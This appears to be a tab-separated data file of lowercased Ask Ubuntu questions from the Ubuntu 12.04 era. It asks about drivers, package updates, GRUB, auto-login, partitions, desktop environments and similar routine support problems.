160590	local .desktop files	i need suggestions . currently fogger creates .desktop files for fogapps and puts them in ~/.local/share/applications so that they can be launched from dash or legacy app menus . everything works as expected but these application shortcuts remain lying around after fogger is removed by the user thus cluttering the applications lens with useless entries . i 've a couple of solutions in mind . ship fogger with a postremoval script which finds all fogapp .desktop files for every user and removes or disables them ( hidded attribute ) and a preinstall script which again finds already present apps and enables thems . this should be straight forward but i 'm not sure if it is considered a sane practice for deb files to mess with users ' home directories . second solution is to keep all the .desktop files hidden by default and ship fogger with a special lens for launching fogapps . the draw back here is that fogapps will not be shown in legacy menus or launchers other than dash like synapse . also , only 2 days are left to implement this and fix/improve/add other features .
160605	what packages/how do i uninstall propriety amd catalyst driver	how do i go back to the open source driver ? i installed amd driver following on screen instructions but have a little shaded square in bottom right hand corner that says `` amd unsupported hardware '' . the linux pdf says to use native package manager to uninstall driver , but i need to know what it is called to locate it . thanks .
160606	how to delete grub menu from the disk without linux ?	how do i remove grub menu from the disk without linux ? when i boot from the disc out the string grub rescue . previously , i installed ubuntu 10.10 and randomly chose the wrong drive .
160609	ubuntu 12.04 desktop automatic login not working	when i first installed ubuntu 12.04 desktop on this machine the auto login worked fine . now it does not . i 've run some google searches and i 've seen plenty of the typical go to settings and unlock and ... to enable auto login . but the setting is enabled and was working . i suspect the issue has to do with having logged into kde plasma as the login screen is now the plasma login instead of the original unity one . originally the machine was running unity3d ( the default ) but i could n't get my vnc viewer to work so it was recommended that i use unity2d . however , before going to unity2d i decided to try kde plasma . i believe this is when the auto login stopped working - i was n't paying attention to exactly when the auto-login stopped working because i was attempting to solve another more pressing problem . from what i remember of the kde install instructions it is n't as simple as apt-get purge kde to get rid of the kde desktop . any thoughts on how to get the auto-login to work again ? i have crons running under that user that could be made root crons but i 'd rather not .
160612	blocking popups and ads	i 'm having a fight with ads , popups and tracking cookies . but i 'm having some issues . software used : chromium 18.0.1025.168 extensions used : adblock plus ( beta ) 1.2 adblock+ element hiding helper1.1.9.18 better pop up blocker2.1.6 ghostery3.0.0 with this configuration , i 'm always getting this error : warning : this extension failed to modify a network request because the modification conflicted with another extension . i know if i disable `` better popup '' , this goes away . it 's perfectly normal , due to those extensions trying to block the same things . problem is , i ca n't live without all of them ! can anyone advise me about some good configuration ? ca n't live without adblock plus , because i hate ads . better popup blocker is essential too ( believe me , chrome does n't block a lot of popups , and i have a website or 2 that can prove that . ) and ghostery is a must ... i ca n't bare the idea of being tracked all the time by some companies . so i 'm kinda lost here ! everything is needed , but they conflict with each other . i mean , it has to exist a perfect combination out there , i know i 'm not the only one hating the privacy issues nowadays ! i am really thankful for any tips guys .
160616	how to allow a `` standard user '' ( no sudo ) make ip config changes without requiring admin password	anyone know if it is possible to have a `` standard user '' account make ip changes ( via gui or terminal ) without requiring the admin ( sudo ) password ? i want the user to be able to change interface from and to dhcp + set a static config ( ip , mask , dg , dns ) . thanks !
160618	audio stutter in in ubuntu 12.04	after upgrading to precise my audio is stuttering . it is happening , in vlc , mplayer , and anything streaming from the internet . i followed the procedures in https : //help.ubuntu.com/community/soundtroubleshootingprocedure but nothing has helped so far . there is the problem that the driver version is out of date but it does not seem to want to update with the given commands . $ bash alsa-info.sh -- stdout |grep version driver version : 1.0.24 library version : 1.0.25 utilities version : 1.0.25 how can i upgrade the driver and fix the stuttering ?
160619	how to use inputted text with quickly	i just need the code necessary to have my application assign the input from a text box to a variable after 'enter ' is pushed , and then use it to change a label . this is what i have for this problem : def on_action_activated ( self ) : self.next = self.action.get_text ( ) and then for using it i 'm doing : info.set_text ( `` would you like to start a new game ? ( no saving yet , working on it ... ) '' ) and it 's not working for me . now i 'm doing all of this in several different functions , so would that be causing the problem , or is it just something else ? i have created the local variable for both the label and the text box .
160623	will ubuntu work if i install it offline ?	i´m going to install ubuntu 12.04 on my laptop , and i don’t have internet at home . i know that i can install it without internet , but , does it work ?
160628	what 's the difference between ubuntu server and ubuntu cloud live image ?	i 'm not sure what the difference is or which one i should download . i have a server rack i 'm putting together and i do n't know much about servers . i love ubuntu though . if i want to use this a work server to host things and a personal server for experimenting , which should i use ? i also might dual boot this with windows server 2008 eventually . i 'm using a dell power edge 2500 with 5 scuzzy drive totaling 100gbs and maybe 2gbs of ram .
160631	how do i push my app to launchpad if i have followed the recommendations of the app review board for quickly apps ?	i developed an app called discvur with quickly . i intend to submit it to the app review board so that it can be published in the software center . therefore i followed all the recommendations on https : //wiki.ubuntu.com/appreviewboard/submissions/quicklytips and changed my files accordingly . nevertheless , when i do quickly share , quickly overwrites all my debian files . so my app is not installed in /opt/ and i can not launch it at all . am i having a bug , did i do something wrong while following the instructionsâ ?
160636	i want files in fat32 partition to be shown in my personal folder	i have a 25 gig partition in ext4 for ubuntu , an ntfs 25 gig partition for windows 7 , a logical swap of 2 gig , and then a logical 60 gig partition in fat32 which i 've read is the correct file system for files as music , pics , videos i want to share with windows . the problem is that those files are not `` asociated '' or shown in my personal folder , and it would be great to .
160637	why is my package information seemingly not updating ?	are there no updates for anything or has something gone wrong on my computer ? as of recent , i have been getting a red warning triangle in my notification bar : when i go to my update manager , it tells me that i have not updated my package information in 14 days ( i have ) if i update it , many sources are left at 0 % with the word `` idle '' instead of `` downloaded '' and here 's running sudo apt-get update : jack @ jack-hp-compaq-nc6400-eh522av : ~ $ sudo apt-get update [ sudo ] password for jack : ign http : //extras.ubuntu.com precise inrelease ign http : //ppa.launchpad.net precise inrelease hit http : //packages.medibuntu.org precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //gb.archive.ubuntu.com precise inrelease ign http : //gb.archive.ubuntu.com precise-updates inrelease ign http : //gb.archive.ubuntu.com precise-backports inrelease ign http : //security.ubuntu.com precise-security inrelease ign http : //archive.canonical.com precise inrelease hit http : //extras.ubuntu.com precise release.gpg ign http : //apt.last.fm debian inrelease get:1 http : //repository.spotify.com stable inrelease [ 2,979 b ] ign http : //dl.google.com stable inrelease ign http : //dl.google.com stable inrelease hit http : //ppa.launchpad.net precise release.gpg hit http : //gb.archive.ubuntu.com precise release.gpg hit http : //gb.archive.ubuntu.com precise-updates release.gpg hit http : //archive.canonical.com precise release.gpg hit http : //security.ubuntu.com precise-security release.gpg hit http : //extras.ubuntu.com precise release hit http : //apt.last.fm debian release.gpg get:2 http : //dl.google.com stable release.gpg [ 198 b ] hit http : //ppa.launchpad.net precise release.gpg hit http : //gb.archive.ubuntu.com precise-backports release.gpg err http : //repository.spotify.com stable inrelease hit http : //archive.canonical.com precise release hit http : //security.ubuntu.com precise-security release hit http : //apt.last.fm debian release get:3 http : //dl.google.com stable release.gpg [ 198 b ] hit http : //ppa.launchpad.net precise release hit http : //gb.archive.ubuntu.com precise release hit http : //extras.ubuntu.com precise/main sources hit http : //ppa.launchpad.net precise release get:4 http : //dl.google.com stable release [ 1,347 b ] hit http : //gb.archive.ubuntu.com precise-updates release hit http : //packages.medibuntu.org precise/free i386 packages hit http : //archive.canonical.com precise/partner sources hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //security.ubuntu.com precise-security/main sources hit http : //gb.archive.ubuntu.com precise-backports release get:5 http : //dl.google.com stable release [ 1,347 b ] hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex hit http : //security.ubuntu.com precise-security/restricted sources hit http : //security.ubuntu.com precise-security/universe sources hit http : //security.ubuntu.com precise-security/multiverse sources hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //apt.last.fm debian/stable i386 packages hit http : //packages.medibuntu.org precise/non-free i386 packages hit http : //ppa.launchpad.net precise/main sources hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //gb.archive.ubuntu.com precise/main sources ign http : //apt.last.fm debian/stable translationindex get:6 http : //dl.google.com stable/main i386 packages [ 1,237 b ] hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //gb.archive.ubuntu.com precise/restricted sources hit http : //gb.archive.ubuntu.com precise/universe sources hit http : //gb.archive.ubuntu.com precise/multiverse sources hit http : //gb.archive.ubuntu.com precise/main i386 packages hit http : //gb.archive.ubuntu.com precise/restricted i386 packages hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en ign http : //packages.medibuntu.org precise/free translationindex hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //gb.archive.ubuntu.com precise/universe i386 packages ign https : //private-ppa.launchpad.net precise inrelease ign http : //dl.google.com stable/main translationindex hit http : //gb.archive.ubuntu.com precise/multiverse i386 packages hit http : //gb.archive.ubuntu.com precise/main translationindex hit http : //gb.archive.ubuntu.com precise/multiverse translationindex hit http : //gb.archive.ubuntu.com precise/restricted translationindex hit http : //gb.archive.ubuntu.com precise/universe translationindex hit http : //gb.archive.ubuntu.com precise-updates/main sources hit http : //security.ubuntu.com precise-security/universe translation-en ign http : //archive.getdeb.net precise-getdeb inrelease get:7 http : //dl.google.com stable/main i386 packages [ 768 b ] hit http : //gb.archive.ubuntu.com precise-updates/restricted sources hit http : //gb.archive.ubuntu.com precise-updates/universe sources hit http : //gb.archive.ubuntu.com precise-updates/multiverse sources ign http : //packages.medibuntu.org precise/non-free translationindex ign http : //dl.google.com stable/main translationindex hit http : //gb.archive.ubuntu.com precise-updates/main i386 packages hit http : //gb.archive.ubuntu.com precise-updates/restricted i386 packages hit http : //gb.archive.ubuntu.com precise-updates/universe i386 packages hit http : //gb.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //gb.archive.ubuntu.com precise-updates/main translationindex hit http : //gb.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //gb.archive.ubuntu.com precise-updates/restricted translationindex hit http : //gb.archive.ubuntu.com precise-updates/universe translationindex hit http : //gb.archive.ubuntu.com precise-backports/main sources hit http : //gb.archive.ubuntu.com precise-backports/restricted sources hit http : //gb.archive.ubuntu.com precise-backports/universe sources hit http : //gb.archive.ubuntu.com precise-backports/multiverse sources hit http : //gb.archive.ubuntu.com precise-backports/main i386 packages hit http : //gb.archive.ubuntu.com precise-backports/restricted i386 packages hit http : //gb.archive.ubuntu.com precise-backports/universe i386 packages hit http : //gb.archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //gb.archive.ubuntu.com precise-backports/main translationindex hit http : //gb.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //gb.archive.ubuntu.com precise-backports/restricted translationindex hit http : //gb.archive.ubuntu.com precise-backports/universe translationindex hit http : //gb.archive.ubuntu.com precise/main translation-en_gb hit http : //gb.archive.ubuntu.com precise/main translation-en hit http : //gb.archive.ubuntu.com precise/multiverse translation-en_gb hit http : //gb.archive.ubuntu.com precise/multiverse translation-en hit http : //gb.archive.ubuntu.com precise/restricted translation-en_gb hit http : //gb.archive.ubuntu.com precise/restricted translation-en ign http : //extras.ubuntu.com precise/main translation-en_gb hit http : //gb.archive.ubuntu.com precise/universe translation-en_gb hit http : //gb.archive.ubuntu.com precise/universe translation-en hit http : //gb.archive.ubuntu.com precise-updates/main translation-en hit http : //gb.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //gb.archive.ubuntu.com precise-updates/restricted translation-en hit http : //gb.archive.ubuntu.com precise-updates/universe translation-en ign http : //extras.ubuntu.com precise/main translation-en ign http : //archive.canonical.com precise/partner translation-en_gb hit http : //gb.archive.ubuntu.com precise-backports/main translation-en hit http : //gb.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //gb.archive.ubuntu.com precise-backports/restricted translation-en hit http : //gb.archive.ubuntu.com precise-backports/universe translation-en ign https : //private-ppa.launchpad.net precise inrelease ign http : //archive.canonical.com precise/partner translation-en ign http : //apt.last.fm debian/stable translation-en_gb ign http : //apt.last.fm debian/stable translation-en ign http : //ppa.launchpad.net precise/main translation-en_gb ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_gb ign http : //ppa.launchpad.net precise/main translation-en ign http : //dl.google.com stable/main translation-en_gb ign https : //private-ppa.launchpad.net precise inrelease ign http : //dl.google.com stable/main translation-en ign http : //dl.google.com stable/main translation-en_gb hit http : //archive.getdeb.net precise-getdeb release.gpg ign http : //dl.google.com stable/main translation-en ign https : //private-ppa.launchpad.net precise inrelease ign https : //private-ppa.launchpad.net precise inrelease hit http : //archive.getdeb.net precise-getdeb release hit https : //private-ppa.launchpad.net precise release.gpg hit https : //private-ppa.launchpad.net precise release.gpg hit https : //private-ppa.launchpad.net precise release.gpg ign http : //packages.medibuntu.org precise/free translation-en_gb hit https : //private-ppa.launchpad.net precise release.gpg hit https : //private-ppa.launchpad.net precise release.gpg ign http : //packages.medibuntu.org precise/free translation-en hit https : //private-ppa.launchpad.net precise release hit https : //private-ppa.launchpad.net precise release ign http : //packages.medibuntu.org precise/non-free translation-en_gb hit https : //private-ppa.launchpad.net precise release hit http : //archive.getdeb.net precise-getdeb/apps i386 packages hit https : //private-ppa.launchpad.net precise release ign http : //packages.medibuntu.org precise/non-free translation-en hit https : //private-ppa.launchpad.net precise release hit https : //private-ppa.launchpad.net precise/main i386 packages ign https : //private-ppa.launchpad.net precise/main translationindex hit https : //private-ppa.launchpad.net precise/main i386 packages ign https : //private-ppa.launchpad.net precise/main translationindex ign http : //archive.getdeb.net precise-getdeb/apps translationindex hit https : //private-ppa.launchpad.net precise/main i386 packages ign https : //private-ppa.launchpad.net precise/main translationindex hit https : //private-ppa.launchpad.net precise/main i386 packages ign https : //private-ppa.launchpad.net precise/main translationindex hit https : //private-ppa.launchpad.net precise/main i386 packages ign https : //private-ppa.launchpad.net precise/main translationindex ign http : //archive.getdeb.net precise-getdeb/apps translation-en_gb ign http : //archive.getdeb.net precise-getdeb/apps translation-en ign https : //private-ppa.launchpad.net precise/main translation-en_gb ign https : //private-ppa.launchpad.net precise/main translation-en ign https : //private-ppa.launchpad.net precise/main translation-en_gb ign https : //private-ppa.launchpad.net precise/main translation-en ign https : //private-ppa.launchpad.net precise/main translation-en_gb ign https : //private-ppa.launchpad.net precise/main translation-en ign https : //private-ppa.launchpad.net precise/main translation-en_gb ign https : //private-ppa.launchpad.net precise/main translation-en ign https : //private-ppa.launchpad.net precise/main translation-en_gb ign https : //private-ppa.launchpad.net precise/main translation-en fetched 5,096 b in 29s ( 171 b/s ) reading package lists ... done w : an error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //repository.spotify.com stable inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey 082ccedf94558f59 w : failed to fetch http : //repository.spotify.com/dists/stable/inrelease w : some index files failed to download . they have been ignored , or old ones used instead . jack @ jack-hp-compaq-nc6400-eh522av : ~ $ after i update it , it still tells me that i have not updated the package information in 14 days . what 's gone wrong ? thanks , jack : ) running ubuntu 12.04 lts on an hpnc6400 with intel integrated graphics . located in the united kingdom , so i 'm using the gb ubuntu update servers .
160639	can not start android emulator from eclipse on ubuntu	i faced a problem recently . from some point of time i can not start android emulator from eclipse with following console output : [ 2012-07-06 23:19:18 - myapp ] launching a new emulator with virtual device '2_3_3_default_hvga' [ 2012-07-06 23:19:20 - emulator ] x error of failed request : badrequest ( invalid request code or no such operation ) [ 2012-07-06 23:19:20 - emulator ] major opcode of failed request : 135 ( glx ) [ 2012-07-06 23:19:20 - emulator ] minor opcode of failed request : 19 ( x_glxqueryserverstring ) [ 2012-07-06 23:19:20 - emulator ] serial number of failed request : 12 [ 2012-07-06 23:19:20 - emulator ] current serial number in output stream : 12 any ideas what could cause that and how to handle ?
160640	how can i add my user to the sudo list ?	i have just installed ubuntu 12.04 , now i am using standard user , but i want to change my user to admin when i got the following error ( link only ) i am not able to paste the picture . this has been coming from terminal ( model image ) and i am also not able to open the disk . please give me an idea of how to solve this problem , which will be very useful for me . thanks in advance
160641	why do i get updates but can not start update manager any more ?	i have an update manager icon . i can right-click it and select either `` check for updates '' or `` install all available updates '' . both of these appear to do something useful . if i do the former first , it changes the icon to reflect how many updates are pending . however , selecting `` update manager '' from that menu does nothing . similarly , selecting `` software updater '' from the top system menu does nothing . when i first installed 12.04 , this was n't happening . it started happening a couple of weeks ago .
160643	virtualbox usb proxy error	using virtualbox 4.1.12 , as packaged in ubuntu 12.04 , i 'm unable to use usb 1.1 device ( a canon fs-4000us scanner ) within a win xp vm . i 'm able to connect other usb devices , such as a usb flash drive , fine , yet the scanner gives : failed to attach the usb device canon scanner [ 1001 ] to the virtual machine winxp . failed to create a proxy device for the usb device . ( error : verr_read_error ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 1968b7d3-e3bf-4ceb-99e0-cb7c913317bb } as follows from other devices working , i 'm in the vboxusers group . any ideas ?
160646	how do i install crash 5.1.6 on 11.04 ?	i am running i386 ( 32-bit ) natty , and have installed crash , but it does n't work on the running system . i found the solution on the crash author 's page -- the problem was fixed in 5.1.6 and i have 5.0.7 -- but i ca n't find a way to upgrade crash to 5.1.6 using either synaptic or apt-get . the machine in question does not have internet access , so i 've downloaded crash_5.1.6-1ubuntu1_i386.deb onto a flash drive ( using a different machine ) and mounted it on the machine where i need the upgrade . however , when i try to install it , apt-get claims that it ca n't find the package . ( i 've tried many variations on this , and also tried using synaptic ; and yes , i 'm aware that the `` -s '' will keep it from actually doing anything -- i want to be sure of what-all it will do before letting it do it -- but should n't it still find the file ? ) $ uname -a linux tester-2012-client-platform 3.2.12 # 3 smp fri jul 6 14:34:59 pdt 2012 i686 i686 i386 gnu/linux $ ( cd /media/16fb-e6bb/pkg & & ll crash_5.1.6* & & sudo apt-get -s -v -- no-download -u install crash=5.1.6 ) -r -- r -- r -- 1 tester tester 2277846 2011-06-17 01:05 crash_5.1.6-1ubuntu1_i386.deb reading package lists ... done building dependency tree reading state information ... done e : version '5.1.6 ' for 'crash ' was not found as shown by the `` ll '' output , the file does exist . how do i get apt-get to see it ?
160647	why does n't 12.04 recognize plugged-in usb devices on startup ?	when i log in , neither of my usb devices is seen . it 's really driving me round the bend , i have usb keyboard and mouse connected . i have to unplug them then plug again and only then it works correctly .
160648	running back-in-time on ubuntu server	so , i just installed ubuntu server and installed a basic , stripped-down graphical interface onto it so that i can use it . since i 'm new , i needed it . i am using it to run a minecraft server , and was recommended the back-in-time package to use for backups . i installed the back-in-time package from the ubuntu software center , but it did n't show up on the bar . i tried using the dash , but it did n't show up either . how do i launch the application ? i tried installing through terminal too , but that did n't work either . please help !
160655	why does n't wolfram workbench work on 64-bit ubuntu ?	i have downloaded the shell script ( workbench_2.0.0_linux.sh ) , i have run it as root with it giving no complaints , relevant looking files have appeared in /usr/local/wolfram/wolframworkbench/2.0/ and it has created the executable `` wolframworkbench '' in /usr/local/bin . however , when i run wolframworkbench from terminal it spits out /usr/local/bin/wolframworkbench : 46 : exec : /usr/local/wolfram/wolframworkbench/2.0/wolframworkbench : not found that file does indeed exist , and is executable . i have also tried running it directly , and i have also tried running the /usr/local/wolfram/wolframworkbench/2.0/executables/wolframworkbench too . is there something i 'm missing ? ( i am running ubuntu 12.04 64bit with openjdk7 )
160674	how do i burn an ubuntu cd or usb on a mac ?	i 'm trying to install ubuntu on a pc with no os . i have a mac and tried burning the disk and my mac did not like the disk . i would like to do that or create a usb boot instead .
160676	problems installing tex live 2012 on 12.04	the tex live included in ubuntu 12.04 is very old ( 2009 ) , and i would like to install the latest version to be able to edit the ubuntu manual . how do i do that from the terminal ? hello , my name is chris . i am a student pursuing a career in technical writing and i would like to assist the ubuntu community while gaining experience & building my resume . i need to install upstream version of tex live for 12.04 to edit the manual for ubuntu . i am having a difficult time installing it per the directions @ http : //ubuntu-manual.org/getinvolved/editors # install-texlive . tex live documents are on my computer , but i am not able to run the install . no tex live program found on my computer . any help is greatly appreciated ! ~thanx ! ~ below i have listed the prior attempts & links to view the posts of each attempt : backports i have tried using the official backports of the latest ( 2012 ) tex-live via their ppa . please refer to link below for the particulars . how do i install the latest tex live 2012 on ubuntu 12.04 ? latex i 've also tried running latex as suggested . please refer to link below for the particulars . http : //ubuntuforums.org/showthread.php ? t=2019051 ppa causing issue ? ? or something else i came across a post concerning the ability to install programs via the terminal and am wondering if it may be my problem ? ? ? please refer to link below for the particulars . ppa - tex live can not install anything through terminal - apt-get -f install
160679	ca n't create folder links from a fat32 partition	when i try to create links from several folders ( created on windows 7 ) in order to put them on my personal folder , i get the following error : error creating the link to [ folder ] - destination does not support symbolic links cancel / skip / skip everything
160681	laptop shuts down upon waking from suspend	the computer enters suspend either by closing lid , choosing suspend from the top-right drop down , or hitting the power button and pressing suspend . it does n't matter . i then attempt to wake the computer either by opening the lid ( if it was closed ) or hitting the power button . again , does n't matter . the computer will then immediately shutdown about 50 % of the time . it seems to be more likely to shut down the longer it has been on suspend . i took a snapshot of /var/log/pm-suspend.log after a successfully resume and a shutdown . the only difference ( outside of timestamps of course ) was that a successful resume , after reporting the success of various suspend hooks , writes : thu jul 5 21:36:45 pdt 2012 : performing suspend thu jul 5 21:37:10 pdt 2012 : awake . thu jul 5 21:37:10 pdt 2012 : running hooks for resume and then reports successful resume hooks . when it shuts down , the log ends at `` performing suspend '' . i diffed the two files so i know this is the only difference . thus , it looks like it 's not even trying to wake up . would love some ideas on this one . i 've scoured the web but ca n't seem to find anyone else running into the same issue ( it seems more common that the computer shuts down upon entering suspend , or only on hitting the power button to wake , and have n't seen any that are random like mine ) . i 'll update with any requested information . edit : forgot to give my laptop 's details ! i 'm running 12.04 , 64 bit , on a dell inspiron 1420 with a intel core 2 duo , 1.5ghz . no graphics card . 2g of ram . i recently had to disassemble and reassemble it ( had to install a fan ) , and so could have messed something up in that process . update : i 've upgraded to 12.10 and am still having the same problem .
160690	accessing dvd or usb drive	when i insert a dvd or usb drive into the computer it does not open . are there additional drivers that i need to install ? i know the usb drive is working because i installed ubuntu using it .
160691	what procedure should i take to update a specific application ?	i installed nmap from the software center and their version is 5.21 . after this , i downloaded the latest version that is 6.01 but i have n't installed it yet . what i should do and why ? uninstall the currently installed version and then install the new version . or.. even with an older version installed , install the new one over this . is this applicable to upgrading any software packages on ubuntu or it does n't ?
160695	installer ca n't find partition , but fdisk can find them	my computer had two operating systems installed : windows xp and ubuntu 10.10 . now , i want to update ubuntu to 12.04 . i used a usb disk to install 12.04 . but the installer ca n't find my partitiona . fdisk can find them . how can i fix this ? ubuntu @ ubuntu : ~ $ sudo lshw -short h/w path device class description ====================================================== system hp 2230s ( nn868pa # ab2 ) /0 bus 3037 /0/9 memory 64kib bios /0/0 processor intel ( r ) core ( tm ) 2 duo cpu t6570 @ 2.10ghz /0/0/1 memory 2mib l2 cache /0/0/3 memory 32kib l1 cache /0/0/0.1 processor logical cpu /0/0/0.2 processor logical cpu /0/2 memory 32kib l1 cache /0/4 memory 2gib system memory /0/4/0 memory sodimm [ empty ] /0/4/1 memory 2gib sodimm ddr2 synchronous 800 mhz ( 1.2 ns ) /0/100 bridge mobile 4 series chipset memory controller hub /0/100/2 display mobile 4 series chipset integrated graphics controller /0/100/2.1 display mobile 4 series chipset integrated graphics controller /0/100/1a bus 82801i ( ich9 family ) usb uhci controller # 4 /0/100/1a.1 bus 82801i ( ich9 family ) usb uhci controller # 5 /0/100/1a.2 bus 82801i ( ich9 family ) usb uhci controller # 6 /0/100/1a.7 bus 82801i ( ich9 family ) usb2 ehci controller # 2 /0/100/1b multimedia 82801i ( ich9 family ) hd audio controller /0/100/1c bridge 82801i ( ich9 family ) pci express port 1 /0/100/1c.1 bridge 82801i ( ich9 family ) pci express port 2 /0/100/1c.1/0 wlan1 network pro/wireless 5100 agn [ shiloh ] network connection /0/100/1c.2 bridge 82801i ( ich9 family ) pci express port 3 /0/100/1c.4 bridge 82801i ( ich9 family ) pci express port 5 /0/100/1c.5 bridge 82801i ( ich9 family ) pci express port 6 /0/100/1c.5/0 eth1 network 88e8072 pci-e gigabit ethernet controller /0/100/1d bus 82801i ( ich9 family ) usb uhci controller # 1 /0/100/1d.1 bus 82801i ( ich9 family ) usb uhci controller # 2 /0/100/1d.2 bus 82801i ( ich9 family ) usb uhci controller # 3 /0/100/1d.7 bus 82801i ( ich9 family ) usb2 ehci controller # 1 /0/100/1e bridge 82801 mobile pci bridge /0/100/1f bridge ich9m lpc interface controller /0/100/1f.2 scsi0 storage 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] /0/100/1f.2/0 /dev/sda disk 500gb wdc wd5000bevt-0 /0/100/1f.2/0/1 /dev/sda1 volume 48gib windows ntfs volume /0/100/1f.2/0/2 /dev/sda2 volume 416gib extended partition /0/100/1f.2/0/2/5 /dev/sda5 volume 97gib hpfs/ntfs partition /0/100/1f.2/0/2/6 /dev/sda6 volume 198gib hpfs/ntfs partition /0/100/1f.2/0/2/7 /dev/sda7 volume 27gib linux filesystem partition /0/100/1f.2/0/2/8 /dev/sda8 volume 93gib linux filesystem partition /0/100/1f.2/1 /dev/cdrom disk cddvdw ts-l633m /0/1 scsi6 storage /0/1/0.0.0 /dev/sdb disk 15gb storage device /0/1/0.0.0/0 /dev/sdb disk 15gb /0/1/0.0.0/0/1 /dev/sdb1 volume 14gib windows fat volume /1 power hz04037 ubuntu @ ubuntu : ~ $ ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x31263125 device boot start end blocks id system /dev/sda1 * 63 102277727 51138832+ 7 hpfs/ntfs/exfat /dev/sda2 102277728 976784129 437253201 f w95 ext 'd ( lba ) /dev/sda5 102277791 307078127 102400168+ 7 hpfs/ntfs/exfat /dev/sda6 307078191 724141151 208531480+ 7 hpfs/ntfs/exfat /dev/sda7 724142080 781459455 28658688 83 linux /dev/sda8 781461504 976771071 97654784 83 linux disk /dev/sdb : 15.9 gb , 15931539456 bytes 64 heads , 32 sectors/track , 15193 cylinders , total 31116288 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009eb92 device boot start end blocks id systemfile : ///home/ubuntu/pictures/screenshot % 20from % 202012-07-07 % 2010:25:40.png /dev/sdb1 * 32 31115263 15557616 c w95 fat32 ( lba ) ubuntu 12.04 's installer ca n't find the partition in my hard disk . it only find the device - /dev/sda .
160707	how to change the font in lightdm	i want to change the font in lightdm ( ubuntu 12.04 default login screen ) but the unity-greeter.conf file is in blank . thank you .
160708	how to completely remove the kubuntu-desktop ?	i installed the kubuntu-desktop on ubuntu 12.04 . i promptly removed it , the applications it installed are still there but that 's not matter . but i can still choose kubuntu plasma desktop during login . clearly i have n't removed it completely . i went to the ubuntu software centre and removed it from there . then i did the removal process from here . i did : sudo apt-get install -y ppa-purge sudo ppa-purge ppa : kubuntu-ppa/backports sudo apt-get -f -y autoremove still there . how do i remove it completely ? thanks . update : @ xlukask i did the command and got this output : reading package lists ... done building dependency tree reading state information ... done package ktorrent is not installed , so not removed package ktorrent-data is not installed , so not removed package kubuntu-desktop is not installed , so not removed package libktorrent-l10n is not installed , so not removed package libktorrent3 is not installed , so not removed package plymouth-theme-kubuntu-logo is not installed , so not removed package plymouth-theme-kubuntu-text is not installed , so not removed package dolphin is not installed , so not removed package ktimetracker is not installed , so not removed some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : icedtea-netx : depends : openjdk-6-jre ( > = 6b23~pre10~ ) but it is not going to be installed or openjdk-7-jre but it is not going to be installed libatk-wrapper-java : depends : default-jre but it is not going to be installed or java2-runtime libatk-wrapper-java-jni : depends : default-jre but it is not going to be installed or java2-runtime e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
160719	why is the lowlatency kernel not being updated in parallel with the generic kernel ?	i did : sudo apt-get install linux-lowlatency linux-headers-lowlatency i 'm trying to get better perfomance for some audio apps . it is still stuck at 3.2.0.23 whereas the generic kernel is already several updates ahead of it at a version 3.2.0.26 . what is the update policy on this lowlatency kernel ?
160722	avoid try/install selector on 12.04	i have a live ( persistent ) 12.04 ubuntu distro set up on my pendrive i use for recovery/install purposes . every time i boot the distro it asks me if i want to install ubuntu . how can i automatically skip this and automatically go to try mode ? i have been looking how to do it for at least one hour and i could only find some syslinux.cfg hack that does n't apply to this version .
160725	downloading ubuntu 12.04	i started downloading ubuntu last night . it has stopped downloading . i am installing it along side windows . how do i get it to continue to download ? it is locked-up .
160727	12.04 wo n't run gnome desktop	i 've been running with ubuntu unity for a while but i installed gnome for my son to use , it worked when i first set it up but now it does n't matter what option i pick at the login screen it boots to unity ?
160729	which version of ubuntu is best for home media server and nas ?	i have an hp microserver with 2gb ram and amd n40l processor . i want to know what ubuntu version will be best for and home media centre and also nas ?
